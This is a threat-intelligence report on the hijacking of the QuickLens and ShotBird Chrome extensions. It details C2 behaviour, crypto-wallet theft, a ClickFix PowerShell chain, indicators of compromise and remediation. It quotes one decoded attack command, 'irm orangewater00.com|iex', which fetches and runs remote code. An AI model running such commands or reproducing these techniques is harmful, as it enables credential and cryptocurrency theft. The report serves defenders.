Threat reportSupply ChainTL-2026-0203

Chrome Extension Supply Chain Attack — QuickLens/ShotBird Ownership Transfer Hijack (CVE-less)

highMONITORING

Chrome Extension Supply Chain Attack (TL-2026-0203), also tracked as QuickLens Supply Chain Attack, is a high-severity supply-chain compromise scored CVSS 8.1, first published 2026-03-10. It carries a reported Russia nexus and is not formally attributed, affects Google Chrome Browser (QuickLens extension), maps to 18 MITRE ATT&CK techniques (T1005, T1027, T1036), and is covered by 9 detection rules and 25 indicators of compromise.

CVSS
8.1/10High
CVEs
0None referenced
Techniques
18MITRE ATT&CK
Actors
0Not attributed
Detection rules
9SPL · KQL · Sigma
IOCs
25Indicators of compromise

Key facts for TL-2026-0203

Threat ID
TL-2026-0203
Also known as
QuickLens Supply Chain Attack, ShotBird Malware Campaign, ExtensionHub Ownership Transfer Attack
Severity
HIGH
CVSS
8.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)
Status
MONITORING
Category
SUPPLY_CHAIN
First published
Last reviewed
Attribution confidence
NONE
Nation-state nexus
Russia
Motivation
FINANCIAL
Target sectors
cryptocurrency, financial, technology, advertising, media, general-consumer
Target regions
Global, North America, Europe, Asia
Detection rules
9
Indicators of compromise
25

Malware and tooling in Chrome Extension Supply Chain Attack

Malware and tooling: Amos Infostealer, Chrome, PowerShell

How Chrome Extension Supply Chain Attack works

Threat actors acquired legitimate Chrome extensions QuickLens (~7,000 users) and ShotBird (~800 users) through marketplace ownership transfers, weaponizing update channels to deploy C2-driven malware, cryptocurrency wallet theft, ClickFix-style PowerShell execution chains, and form-data capture affecting approximately 7,800 users.

A coordinated supply chain campaign compromised two previously trusted Chrome extensions — QuickLens (ID: kdenlnncndfnhkognokgfpabgkgehodd) and ShotBird (ID: gengfhhkjekmlejbhmmopegofnoifnjp) — through developer account ownership transfers facilitated by the ExtensionHub marketplace.

QuickLens, originally a Google Lens utility published by developer BuildMelon (akshayanuonline@gmail.com), was listed for sale on ExtensionHub on October 11, 2025. On February 1, 2026, ownership transferred to support@doodlebuggle.top under the entity 'LLC Quick Lens'. On February 17, 2026, malicious version 5.8 was pushed to approximately 7,000 users. The update requested expanded permissions (declarativeNetRequestWithHostAccess, webRequest) and introduced a rules.json that stripped Content-Security-Policy, X-Frame-Options, and X-XSS-Protection headers from all HTTP responses.

The extension communicated with the C2 server api.extensionanalyticspro[.]top every 5 minutes, generating a persistent UUID for bot identification, fingerprinting the victim's country via Cloudflare's trace endpoint, and detecting browser/OS. Malicious JavaScript payloads were delivered through the C2 and executed on every page load using a covert 1x1 GIF pixel onload trick — a hidden img element whose onload handler executed attacker-supplied scripts.

The cryptocurrency theft module detected the presence of MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Backpack, Brave Wallet, Exodus, Binance Chain Wallet, WalletConnect, and Argon crypto wallets. When found, it targeted seed phrases, private keys, and transaction histories for exfiltration. Additional data exfiltration targeted Gmail inbox contents, Facebook Business Manager advertising accounts, YouTube channel data, and general login credentials and payment information from web forms.

ShotBird, a screenshot and tweet image editor (~800 users, ID: gengfhhkjekmlejbhmmopegofnoifnjp), originally published November 2024 by the same developer (Akshay Anu S), received Chrome's Featured badge in January 2025. Ownership transferred to loraprice198865@gmail.com between December 2025 and February 2026. The malicious version communicated with api.getextensionanalytics[.]top using an identical callback-driven C2 architecture with /setup, /callback, /finish, and /uninstall endpoint families.

ShotBird's capabilities included keystroke capture on input, textarea, and select HTML elements targeting sensitive keywords (credentials, financial data, identity fields), Chrome stored data theft (passwords, browsing history, extension information), and injection of fake Chrome update overlays. The fake update templates were delivered from ggl[.]lat and used a ClickFix-style social engineering technique that instructed users to open the Windows Run dialog, execute cmd.exe, and paste a PowerShell command.

The ClickFix chain downloaded googleupdate.exe (SHA256: E8D2ED43386B322DA02C1CFCAEFEBD88D6B470D6CD11F02C20712CF1E8FD8413), a dropper signed with a fake certificate from 'Hubei Da'e Zhidao Food Technology Co., Ltd.' that bundled a legitimate ChromeSetup.exe with a malicious psfx.msi stager. The MSI executed encoded PowerShell that decoded to 'irm orangewater00.com|iex', fetching and executing a second-stage payload. Post-exploitation behavior captured via PowerShell Script Block Logging (Event ID 4104) on March 5, 2026 showed ETW suppression, Windows Credential Manager enumeration, and Chromium browser data targeting (Login Data, Web Data databases).

Code analysis revealed debug artifacts including console.log statements, debugLog wrapper functions, inline Russian-language comments ('Запускаем initApp после загрузки DOM'), and @ts-nocheck directives — indicators of low operational security and possible 'vibe-coded' development. The shared C2 architecture between both extensions confirms a single threat actor or coordinated group operating this campaign.

Possible macOS targeting with the AMOS infostealer variant was also noted. Related malicious extensions in the same campaign ecosystem include Token Chromophore (fake imToken, ID: bbhaganppipihlhjgaaeeeefbaoihcgi) targeting 12/24-word seed phrases, and Chrome MCP Server (ID: fpeabamapgecnidibdmjoepaiehokgda) functioning as a RAT disguised as an AI automation tool.

---

**Revalidated on 2026-03-12**

Post-publication intelligence (March 9-12, 2026) confirms all original findings. Three additional details warrant inclusion: (1) Google actively auto-disabled QuickLens in affected browsers beyond just removing the Chrome Web Store listing, though PCRisk reports some installations may persist. (2) The MonxResearch ShotBird analysis reveals the second-stage payload is more sophisticated than initially assessed — PowerShell Script Block Logging captured a full browser-to-endpoint compromise chain including ETW (Event Tracing for Windows) suppression, Credential Manager enumeration, Chromium data targeting (saved passwords, cookies, autofill), and exfiltration upload logic, classifying this as a complete credential-theft platform rather than just extension-level data capture. (3) CoinTelegraph reporting links this campaign to a broader ClickFix operation where threat actors also impersonate venture capitalists to target cryptocurrency users, suggesting the QuickLens/ShotBird compromise may be one vector within a larger financially-motivated operation. No Google policy changes regarding extension ownership transfers have been announced despite this incident.

MITRE ATT&CK techniques used in TL-2026-0203

collection

T1005 Data from Local System; T1056 Input Capture; T1185 Browser Session Hijacking

defense-evasion

T1027 Obfuscated Files or Information; T1036 Masquerading; T1140 Deobfuscate/Decode Files or Information

exfiltration

T1041 Exfiltration Over C2 Channel

execution

T1059 Command and Scripting Interpreter; T1204 User Execution

command-and-control

T1071 Application Layer Protocol; T1105 Ingress Tool Transfer

persistence

T1176 Software Extensions

initial-access

T1195 Supply Chain Compromise

credential-access

T1539 Steal Web Session Cookie; T1555 Credentials from Password Stores

defense-impairment

T1553 Subvert Trust Controls

resource-development

T1584 Compromise Infrastructure

impact

T1657 Financial Theft

Affected products and versions in Chrome Extension Supply Chain Attack

  • Google — Chrome Browser (QuickLens extension)
    Vulnerable versions: QuickLens v5.8 (malicious)
    Fixed in: Extension removed from Chrome Web Store
  • Google — Chrome Browser (ShotBird extension)
    Vulnerable versions: ShotBird v2.1 (malicious)
    Fixed in: Extension removed from Chrome Web Store
  • Multiple — Cryptocurrency Wallets (MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Solflare, Backpack, Brave Wallet, Exodus, Binance Chain Wallet, WalletConnect, Argon)
    Vulnerable versions: All versions when accessed via compromised browser
  • Microsoft — Windows
    Vulnerable versions: All versions (ClickFix PowerShell execution target)

Remediation for Chrome Extension Supply Chain Attack

Immediate actions

  • Remove QuickLens extension (ID: kdenlnncndfnhkognokgfpabgkgehodd) from all browsers immediately
  • Remove ShotBird extension (ID: gengfhhkjekmlejbhmmopegofnoifnjp) from all browsers immediately
  • Block C2 domains at DNS/firewall: api.extensionanalyticspro.top, api.getextensionanalytics.top, ggl.lat, baysideceu.com, orangewater00.com
  • Block IP 185.178.231.112 at perimeter
  • Rotate all credentials for users who had either extension installed
  • Rotate cryptocurrency wallet seed phrases and transfer funds to new wallets
  • Check PowerShell Script Block Logging (Event ID 4104) for evidence of exploitation
  • Scan for googleupdate.exe (SHA256: E8D2ED43386B322DA02C1CFCAEFEBD88D6B470D6CD11F02C20712CF1E8FD8413)

Workarounds

  • Disable automatic Chrome extension updates pending review
  • Block PowerShell execution for non-administrative users via AppLocker or WDAC
  • Enable PowerShell Script Block Logging and Module Logging across endpoints

Longer-term hardening

  • Implement browser extension allowlisting via Group Policy or Chrome Enterprise management
  • Deploy EDR with behavioral detection for suspicious PowerShell execution chains
  • Monitor for Chrome extension ownership changes in deployed extensions
  • Implement Content Security Policy headers at application level
  • Deploy network monitoring for C2 callback patterns (/setup, /callback, /finish endpoints)
  • Audit all installed browser extensions across the organization

Weaknesses (CWE) in Chrome Extension Supply Chain Attack

CWE-494, CWE-829, CWE-506

Timeline of Chrome Extension Supply Chain Attack

  • ShotBird Chrome extension initially published by developer Akshay Anu S (akshayanuonline@gmail.com)
  • ShotBird v1.1 published and granted Chrome Web Store Featured badge by Google
  • ShotBird rebranded to 'ShotBird - Scrolling Screenshots, Tweet Images & Editor'
  • QuickLens extension listed for sale on ExtensionHub marketplace by original developer BuildMelon
  • Last archived Chrome Web Store listing showing ShotBird under original developer email (akshayanuonline@gmail.com)
  • QuickLens ownership transferred to support@doodlebuggle.top under entity 'LLC Quick Lens' with new privacy policy on barely functional domain
  • Malicious QuickLens v5.8 pushed to ~7,000 users with expanded permissions, C2 polling, header stripping, and crypto theft capabilities
  • ShotBird ownership confirmed transferred to loraprice198865@gmail.com; malicious version 2.1 deployed with callback-driven C2 architecture
  • PowerShell Script Block Logging (Event ID 4104) on affected Windows host captured active ShotBird exploitation including ETW suppression and Credential Manager enumeration across 115 logged fragments
  • Both extensions reported to Google Safe Browsing and Chrome Web Store security team
  • ShotBird listing removed from Chrome Web Store UI; QuickLens previously removed; public disclosure via multiple security outlets
  • As of 2026-05-29, the named QuickLens/ShotBird extensions were removed from the Chrome Web Store and Google auto-disabled QuickLens, but this CVE-less supply-chain threat is not closed: the financially-motivated actor remains undisrupted and runs parallel extensions on identical C2. No Chrome ownership-transfer policy fix exists, so the vector stays exploitable — MONITORING.

Sources cited for Chrome Extension Supply Chain Attack

Detection coverage for TL-2026-0203

As of 2026-03-10, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-0203 across Splunk SPL, Microsoft KQL and Sigma, covering 25 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.

9 detection rules (Splunk SPL, Microsoft KQL, Sigma) · Blue and above. Compare plans
25 indicators of compromise · Red and above. Compare plans

Further reading

Threadlinqs Intelligence — Real-Time Threat Detection Platform

[ 0 threats ] [ 0 det ] [ CRIT: 0 ] [ HIGH: 0 ]
// threat_feed
$ sort --newest
Showing all threats

Live intelligence console

Threat level
Fig. 01 · Threat weatherIndexing the archive…
1 square = 1 threat · click to open

Latest Threats